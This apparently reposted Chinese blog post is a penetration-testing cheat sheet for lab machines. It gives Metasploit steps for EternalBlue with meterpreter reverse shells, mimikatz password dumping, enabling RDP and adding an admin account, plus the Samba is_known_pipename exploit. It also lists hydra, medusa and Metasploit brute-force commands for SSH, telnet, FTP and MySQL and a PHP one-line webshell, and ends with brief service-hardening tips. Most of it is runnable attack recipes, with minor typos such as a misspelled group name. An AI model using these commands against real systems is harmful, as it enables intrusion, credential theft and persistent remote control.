渗透

                  1、渗透 windows7 

1、准备环境

渗透机:一台kali      ip:192.168.191.153

靶机:一台windows7  windows7ip:192.168.191.130  contos6 ip:192.168.191.167

2、打开渗透机kali。

3、先用 nmap 进行扫描,然后分析扫描结果,如果445端口开了,优先攻击445。

nmap 命令 : nmap -sV -T5 -n 192.168.191.130

 

 显示结果

1、 操作系统:Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)

2、80,135,139,445,1801,2103,2107,49152,49153,49154,49155,49156,49157,49158端口都开了。

4、现在我们来攻击445端口,在Kali用命令  msfconsole 开启Metasploit  (在终端里输入msfconsole)。

路径不知道就搜索 命令:search ms17_010

然后运行命令:use exploit/windows/smb/ms17_010_eternalblue                #使用MS17_010漏洞攻击程序

set RHOST 192.168.191.130                                                     #设置目标主机IP

set payload windows/x64/meterpreter/reverse_tcp                   #设置payload   

#tcp不行就用下面几个payload

#set payload windows/x64/meterpreter/reverse_http

#set payload windows/x64/meterpreter/reverse_https

#set payload windows/x64/meterpreter/reverse_ftp

set LHOST 192.168.191.153                                                        #设置本地主机IP

show options    #查看设置信息

exploit         #实施攻击

 攻击成功,然后使用命令 load mimikatz

 再使用 wdigest

发现 有一个 000 的用户 密码为 111。

然后退出。命令:ctrl+c

 退出后输入 命令:run getgui -e 打开3389远程登录

  新开个终端 命令: rdesktop ip

 

——————————————————————————————————————————————————————————————————————————

 如果 使用命令wdigest后发现没有用户就要创建用户了。

接下来创建用户

首先输入shell

 创建用户命令net user 用户名 密码 /add

net localroup Administratros 用户名 /add 

由于自己创的靶机没有Administratros 组 所以创建失败。

成功的话

 新开有个终端 命令: rdesktop ip

 

 渗透完成,可以为所欲为。

Windows7 和 2008 用 exploit/windows/smb/ms17_010_eternalblue

其它用  版本exploit/windows/smb/ms08_067_netapi 

          2、渗透 linux

1、准备环境

渗透机:一台kali      ip:192.168.191.153

靶机:一台windows7  windows7ip:192.168.191.1  contos6 ip:192.168.191.167

2、打开渗透机kali。

3、先用 nmap 进行扫描,然后分析扫描结果,如果445端口开了,优先攻击445。

nmap 命令 : nmap -sV -T5 -n 192.168.191.167

显示结果

1、 操作系统:Unix,Linux

2、21,22,23,80,139,445,3306端口都开了。

4、现在我们来攻击445端口,在Kali用命令  msfconsole 开启Metasploit  (在终端里输入msfconsole)。

路径不知道就搜索 命令:search is_known

然后运行命令:use exploit/linux/samba/is_known_pipename               

set RHOST 192.168.191.167                                                     #设置目标主机IP

show options    #查看设置信息

exploit         #实施攻击

返回一个shell 等于linux的终端 可以为所欲为。

2、ssh 端口22

路径不知道就搜索 命令:search ssh_login

1、然后运行命令:use auxiliary/scanner/ssh/ssh_login               

set rhost 192.168.191.168                                                     #设置目标主机IP

set USERNAME root                                                             # 设置用户名   # set USERPASS_FILE 字典

set PASS_FILE  字典                 # 设置密码   # set PASSWORD 密码            

show options    #查看设置信息

exploit         #实施攻击

2、hydra -l root -P /root/123.txt 192.168.191.167 ssh

3、medusa -h 192.168.191.167 -u root -P /root/123.txt -M ssh

3、telnet  # 默认 root 用户不能登录 端口23

路径不知道就搜索 命令:search  telnet_login

1、然后运行命令:use auxiliary/scanner/telnet/telnet_login             

set rhost 192.168.191.167                                                     #设置目标主机IP

set USERNAME admin                                                             # 设置用户名   # set USERPASS_FILE 字典

set PASS_FILE  字典                 # 设置密码   # set PASSWORD 密码            

show options    #查看设置信息

exploit         #实施攻击

2、hydra -l admin -P /root/123.txt 192.168.191.167 telnet

3、medusa -h 192.168.191.167 -u admin -P /root/123.txt -M telnet

4、ftp 端口21

路径不知道就搜索 命令:search  ftp_login

1、然后运行命令:use auxiliary/scanner/ftp/ftp_login              

set rhost 192.168.191.167                                                    #设置目标主机IP

set USERNAME admin                                                             # 设置用户名   # set USERPASS_FILE 字典

set PASS_FILE  字典                 # 设置密码   # set PASSWORD 密码            

show options    #查看设置信息

exploit         #实施攻击

2、hydra -l admin -P /root/123.txt 192.168.191.167 ftp

3、medusa -h 192.168.191.167 -u admin -P /root/123.txt -M telnet

5、mysql 端口 3306

路径不知道就搜索 命令:search  mysql_login

1、然后运行命令:use auxiliary/scanner/mysql/mysql_login              

set rhost 192.168.191.167                                                    #设置目标主机IP

set USERNAME root                                                             # 设置用户名   # set USERPASS_FILE 字典

set PASS_FILE  字典                 # 设置密码   # set PASSWORD 密码            

show options    #查看设置信息

exploit         #实施攻击

——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————

6、http  和 mysql 语句 自己看的

一句话木马 <?php @eval($_GET["123"]);?>

1.php?123=system("cat /");

cmd 界面 cat /

mysql select load_file("/");

           3、加固所有服务除了Windows的445和linux445,http没有环境不知道怎么写

1、ftp 

vim /etc/vsftpd/vsftpd.conf
把配置文件里的远程登录关闭,把yes的全部改成no也行。
service vsftpd reload

2、ssh

passwd root

改root 密码 和 删除普通用户

vim /etc/passwd
修改:lynn:x:500:500::/home/lynn:/bin/bash
为: lynn:x:500:500::/home/lynn:/sbin/nologin

直接删除也行

3、telnet

telnet
vim /etc/passwd

删除普通用户

4、mysql 

改密码 或者 禁止mysql服务器的远程访问

要禁止mysql服务器的远程访问,可以修改mysql的配置文件:/etc/mysql/my.cnf
在 [mysqld] 下面添加一句:bind-address = 127.0.0.1就是绑定允许访问的ip为本机ip

改密码

use mysql;
set password for root@localhost = password('123');

猜你喜欢

转载自www.cnblogs.com/linglinglingling/p/11723701.html